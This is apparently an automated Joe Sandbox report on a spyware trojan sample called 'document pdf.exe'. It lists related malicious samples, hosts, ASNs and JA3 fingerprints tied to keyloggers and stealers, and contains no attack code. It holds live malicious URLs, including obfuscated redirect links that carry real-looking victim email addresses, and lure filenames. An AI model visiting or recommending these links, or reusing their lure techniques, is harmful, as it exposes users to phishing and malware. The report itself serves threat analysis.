                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 8m 26s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:13
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:document pdf.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/6@5/4
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 99%
                                                                                                  • Number of executed functions: 86
                                                                                                  • Number of non-executed functions: 23
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.45, 40.126.32.136, 23.56.254.164, 20.12.23.50, 13.95.31.18, 172.202.163.200
                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  10:01:07API Interceptor10615069x Sleep call for process: document pdf.exe modified
                                                                                                  10:01:13API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  132.226.8.169ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  149.154.167.220fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                              https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                  https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgfiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      s-part-0017.t-0009.t-msedge.netA7GSBA08HBVVDSA_pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      http://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      https://o365info.com/get-unlicensed-onedrive-accounts/Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      #U7a0b#U5e8fv1.2.4.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      setup64v6.4.5.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      us2.smtp.mailhostbox.comm30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.91.199.225
                                                                                                                      nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.91.199.224
                                                                                                                      Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.143
                                                                                                                      REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.91.199.224
                                                                                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.199.223
                                                                                                                      api.telegram.orgfiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRUfiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      UTMEMUSyxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 132.244.2.45
                                                                                                                      31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 132.226.42.231
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 132.226.227.252
                                                                                                                      CLOUDFLARENETUShttps://resolute-bear-n9r6wz.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.32.152
                                                                                                                      https://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.79.73
                                                                                                                      http://gleapis.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      http://jennadewanunwrapped.netGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.66.0.145
                                                                                                                      Profile Illustrations and Technical Specifications for This System1.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.80.1
                                                                                                                      PUBLIC-DOMAIN-REGISTRYUSyxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      http://www.technoafriwave.rwGet hashmaliciousUnknownBrowse
                                                                                                                      • 207.174.214.183
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.199.115
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                      • 208.91.198.106
                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 119.18.54.39
                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adfiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Agent381.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_document pdf.exe_dcc08682314b30b79d29fa1c2a2fab423dbfc8b9_0c65fa10_faf57872-d2c8-45f1-8106-7b8831eb10fe\Report.wer

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1324276941010312
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:i0z7l30stA0BU/qa+OJoNZrYjzuiFcIZ24IO8V:i63HxBU/qa5XzuiFcIY4IO8V
                                                                                                                      MD5:69196623F65F3FA586119772455FF634
                                                                                                                      SHA1:11198347B211C84E4278F3DD3538570F6680AA27
                                                                                                                      SHA-256:00C642DE0CAF61D52352763AE1CE10D6A06A91C564E553E383301617721365AE
                                                                                                                      SHA-512:2091EB7444D8263115D8D1629B817BD9ACF7C1C1E1CCE334DD0F2426BCACD5340AD36ADC0F05ACC0B1D9FF34C8F982D23A1F87848F1CBA1263FF88E123D5D08D
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.6.4.9.2.6.9.5.2.0.5.8.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.6.4.9.2.7.1.4.4.2.4.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.f.5.7.8.7.2.-.d.2.c.8.-.4.5.f.1.-.8.1.0.6.-.7.b.8.8.3.1.e.b.1.0.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.b.9.c.7.e.e.-.1.c.7.e.-.4.2.6.a.-.b.2.1.6.-.2.7.d.e.b.6.e.3.7.6.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.o.c.u.m.e.n.t. .p.d.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.C.y.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.5.c.-.0.0.0.1.-.0.0.1.5.-.d.8.8.2.-.5.6.d.0.4.b.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.5.e.6.7.7.e.5.e.4.8.d.5.c.a.9.6.5.b.6.e.2.d.3.f.0.c.8.b.5.6.f.b.8.0.e.7.b.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA83F.tmp.dmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Jan 6 15:01:10 2025, 0x1205a4 type
